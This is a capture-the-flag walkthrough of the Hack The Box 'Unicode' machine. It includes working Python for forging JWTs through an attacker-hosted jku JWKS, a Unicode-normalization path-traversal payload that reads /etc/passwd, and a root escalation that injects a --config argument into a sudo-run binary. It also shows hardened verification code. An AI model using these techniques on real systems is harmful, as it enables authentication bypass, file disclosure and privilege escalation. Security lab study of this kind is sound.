In this post, I would like to share a walkthrough of the Unicode machine from Hack The Box.


This machine is rated Medium difficulty on Hack The Box.

What will you gain from the Unicode machine?


For the user flag, you will forge the JWT (through its jku header) to reach the admin dashboard, then use a Unicode-bypassed LFI to retrieve credentials.


As for the root flag, you need to abuse the treport binary that we are allowed to run with root privileges.

Information Gathering on Unicode Machine


Once we have started the VPN connection (the .ovpn file is downloaded from Hack The Box), we can start the information gathering on the machine by running nmap -sC -sV -p- -Pn <IP Address>


Let's open the website to look for anything we can exploit.


All we get is a simple page with Home, Login, and Register buttons at the top of the website.


Let's register an account that we can use to log in to the Dashboard.


We should be able to login using the credentials that we created earlier.


Welcome to the Dashboard


There is an upload function, but nothing comes back after uploading a file.


Let's look at the cookies set by the website; the session token is a JWT.

JWT information


We can paste the JWT into the debugger at JSON Web Tokens – jwt.io to decode it.


I notice that the header of the token I retrieved contains a jku claim.


For background on JWTs and the jku header, you can read over here


Another piece of information we can retrieve is the URL in that jku value, which we found earlier.


We should do some research on JWKS generators, since we need to host a key set of our own.


As a result, we need to select the options shown above when generating the key.


Aside from that, we need to change the jku value (to the URL where our JWKS is hosted) and the user value, as shown above, and re-sign the token with our key.


At last, we successfully access the admin Dashboard as shown in the screenshot above.
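The forgery above, as an added example that is not code from the machine or from this post: we generate our own RSA key, publish its public half as a JWKS, and sign a token whose jku header points at that JWKS. The verification function shows why it works (the server fetches the key from whatever URL the token names) and what the fix looks like (only ever fetching from a fixed, trusted URL). The URLs TRUSTED_JKU and ATTACKER_JKU are placeholders, not the machine's real hosts, and fetch_jwks stands in for the server's HTTP request so the example runs offline.

```python
"""Added example: forge a JWT whose jku header points at a JWKS we control."""
import base64
import json

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

TRUSTED_JKU = "http://target.htb/static/jwks.json"  # assumption: the app's own JWKS URL
ATTACKER_JKU = "http://10.10.14.5:8000/jwks.json"   # assumption: our listener
KID = "attacker-key"


def b64url(data: bytes) -> str:
    """Base64url without padding, as JOSE requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def int_to_b64url(n: int) -> str:
    return b64url(n.to_bytes((n.bit_length() + 7) // 8, "big"))


def make_jwks(private_key, kid: str) -> dict:
    """JWKS document advertising only the public half of our key."""
    nums = private_key.public_key().public_numbers()
    return {"keys": [{"kty": "RSA", "use": "sig", "alg": "RS256", "kid": kid,
                      "n": int_to_b64url(nums.n), "e": int_to_b64url(nums.e)}]}


def forge_token(private_key, kid: str, jku: str, claims: dict) -> str:
    """RS256 JWT with attacker-controlled jku and kid in the protected header."""
    header = {"alg": "RS256", "typ": "JWT", "kid": kid, "jku": jku}
    signing_input = b64url(json.dumps(header).encode()) + "." + b64url(json.dumps(claims).encode())
    sig = private_key.sign(signing_input.encode(), padding.PKCS1v15(), hashes.SHA256())
    return signing_input + "." + b64url(sig)


def verify_token(token: str, fetch_jwks, trusted_jku=None) -> dict:
    """Server-side check. trusted_jku=None trusts any jku (the bug);
    otherwise keys are only ever fetched from that exact URL."""
    h_b64, p_b64, s_b64 = token.split(".")
    header = json.loads(b64url_decode(h_b64))
    if header.get("alg") != "RS256":
        raise ValueError("unexpected alg")
    jku = header.get("jku")
    if trusted_jku is not None and jku != trusted_jku:
        raise ValueError(f"untrusted jku: {jku}")
    jwks = fetch_jwks(jku)  # vulnerable path: the token decides where the key comes from
    key = next(k for k in jwks["keys"] if k.get("kid") == header.get("kid"))
    n = int.from_bytes(b64url_decode(key["n"]), "big")
    e = int.from_bytes(b64url_decode(key["e"]), "big")
    pub = rsa.RSAPublicNumbers(e, n).public_key()
    # raises cryptography.exceptions.InvalidSignature if the token was tampered with
    pub.verify(b64url_decode(s_b64), (h_b64 + "." + p_b64).encode(),
               padding.PKCS1v15(), hashes.SHA256())
    return json.loads(b64url_decode(p_b64))


def demo():
    """Returns (claims accepted by the vulnerable verifier, whether the hardened one rejected)."""
    attacker_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    hosted = {ATTACKER_JKU: make_jwks(attacker_key, KID)}  # what our web server would serve

    def fetch_jwks(url):  # stands in for the server's HTTP GET of the jku URL
        if url not in hosted:
            raise LookupError(f"no JWKS at {url}")
        return hosted[url]

    token = forge_token(attacker_key, KID, ATTACKER_JKU, {"user": "admin"})
    accepted = verify_token(token, fetch_jwks)  # trusts our jku, so admin is accepted
    try:
        verify_token(token, fetch_jwks, trusted_jku=TRUSTED_JKU)
        rejected = False
    except ValueError:
        rejected = True
    return accepted, rejected


if __name__ == "__main__":
    print(demo())
```

In the real attack the JWKS from make_jwks is served from our own host (a simple HTTP listener is enough) and the token from forge_token replaces the cookie. Note that an allowlist on the jku host alone is not sufficient if the application also has an open redirect or a traversal on that host; pinning the exact URL, or better, not honouring jku at all and keeping the key server-side, removes the problem.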


When we try to view the saved reports, a message appears saying "The Report is being prepared. Please come back later".


The page takes a filename-like parameter, so an LFI (local file inclusion) attack might work here.


However, the plain ../ traversal payload does not give us anything useful; a filter is in the way.


As a result, let's try Unicode look-alike characters for the traversal symbols (they are normalized back to . and / after the filter runs) to bypass the check on the parameter.


The contents of /etc/passwd are shown above.
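The bypass in the two steps above, as an added example that is not the machine's code: a filter that rejects ".." and leading "/" on the raw parameter, followed by NFKC normalization, lets "‥" (U+2025, TWO DOT LEADER) and "／" (U+FF0F, FULLWIDTH SOLIDUS) through and then turns them into ".." and "/". The hardened version normalizes first and then checks the resolved path against the base directory. The base directory /var/www/html is an assumption for illustration, and confusables_for shows how to find bypass characters for any other filtered string.

```python
"""Added example: Unicode normalization after a path filter, and the fix."""
import posixpath
import unicodedata

BASE_DIR = "/var/www/html"  # assumption: the directory the app means to serve files from


def vulnerable_resolve(user_path: str, base: str = BASE_DIR) -> str:
    """Filter first, normalize second: the ordering that the bypass relies on
    (reconstructed pattern, not the box's own code)."""
    if ".." in user_path or user_path.startswith("/"):
        raise ValueError("traversal rejected")
    normalized = unicodedata.normalize("NFKC", user_path)  # "\u2025" -> "..", "\uff0f" -> "/"
    return posixpath.normpath(posixpath.join(base, normalized))


def hardened_resolve(user_path: str, base: str = BASE_DIR) -> str:
    """Normalize first, then check that the resolved path is still inside base."""
    normalized = unicodedata.normalize("NFKC", user_path)
    candidate = posixpath.normpath(posixpath.join(base, normalized))
    if posixpath.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory")
    return candidate


def confusables_for(target: str, limit: int = 0x10000) -> list:
    """Non-ASCII code points whose NFKC form equals target, i.e. candidate filter bypasses."""
    return [chr(cp) for cp in range(0x80, limit)
            if unicodedata.normalize("NFKC", chr(cp)) == target]


if __name__ == "__main__":
    payload = "\u2025/\u2025/\u2025/etc/passwd"  # what "%e2%80%a5/" decodes to in the URL
    print(vulnerable_resolve(payload))            # /etc/passwd
    for ch in confusables_for(".."):
        print(f"U+{ord(ch):04X} normalizes to '..'")
```

On the real filesystem you would use os.path.realpath on the candidate before the commonpath check so that symlinks inside the base directory cannot point outside it either. The general rule is that every canonicalisation step (Unicode normalization, percent-decoding, path resolution) has to happen before the security check, not after it.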


Let's use the LFI to look around the nginx configuration directory (/etc/nginx) to find where the application lives.


One of the application files we reach this way contains the database connection settings.


That gives us credentials: the user "code" and its password.


Finally, we should be able to access the machine via SSH with those credentials.


Lastly, we can read the user flag with the command "cat user.txt".

Escalating to Root Privileges


To find a binary we can run with root privileges for further escalation, we run the sudo -l command.


Checking the binary with the file command shows it is an LSB (ELF) executable.


Let's transfer the file to our own machine to analyze it.


However, the file content is not readable as it is, so looking at it directly tells us nothing.


The binary is a PyInstaller bundle, so let's install pyinstxtractor on our machine and run it against the file, as shown above.


A new folder with the extracted contents has been created by that step.


We also notice that the extracted file is Python 3.9 byte-compiled code (.pyc), so we need to decompile it.


As a result, we need to install a Python decompiler that supports 3.9 bytecode.


I will skip over the screenshot above, since it only shows the installation of the tool.


At last, we are able to read the source of treport.


Let's run treport with sudo so that we can obtain the root flag.


From the code analysis, menu choice 3 passes our input straight onto the command line of the tool it wraps, so we can supply {--config, /root/root.txt}: the wrapped tool then reads the root-owned file as its configuration and, since the flag is not a valid setting, echoes it back in its error output.